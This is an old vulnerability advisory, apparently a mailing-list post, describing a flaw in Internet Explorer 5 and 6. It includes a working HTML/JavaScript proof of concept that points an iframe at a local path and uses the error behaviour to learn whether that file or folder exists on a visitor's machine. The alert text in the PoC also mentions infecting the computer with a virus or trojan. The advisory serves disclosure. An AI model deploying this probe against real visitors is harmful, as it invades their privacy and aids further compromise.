Description: ============ This vulnerability, are based on the equal characteristics discovered by the company GreyMagic Software of Israel in some of the versions of the navigator Opera. This bug also is available in the popular MS Internet Explorer, which could be operated by a remote user to acquire sensible data of a remote system. When a file or directory is assigned iframe that does not exist, this navigator will generate an error. A remote user can create code HTML that loads iframe and changes to the URL from this resource to a file or local directory, and then detects if there is that error to determine if that element exists. Proof Of Concept (POC/Exploit): =============================== ------------------------- <iframe src=""></iframe> <script type="text/javascript"> onload=function () { var sLocal="C:/some_file_or_folder"; frames[0].location.href=sLocal; setTimeout( function () { try { frames[0].document; alert(sLocal+" does not exists.\nHere could execute a script that infects the computer with some virus, trojan, etc"); } catch (oErr) { alert(sLocal+" Exists.\nThen do nothing"); } }, 250 ); } </script> ------------------------- Tested on: ========== MS Internet Explorer 6.0.2800.1106 (SP1,Q867801) Win9x MS Internet Explorer 5.0 Windows 2000 Also in Mozilla Firefox without success. More Info: ========== Opera Local File/Directory Detection. Disclaimer: =========== The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind. We are not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Version en Español: =================== -- Martin [XyborG] Aberastegue NEU: Bis zu 10 GB Speicher für e-mails & Dateien! 1 GB bereits bei GMX FreeMail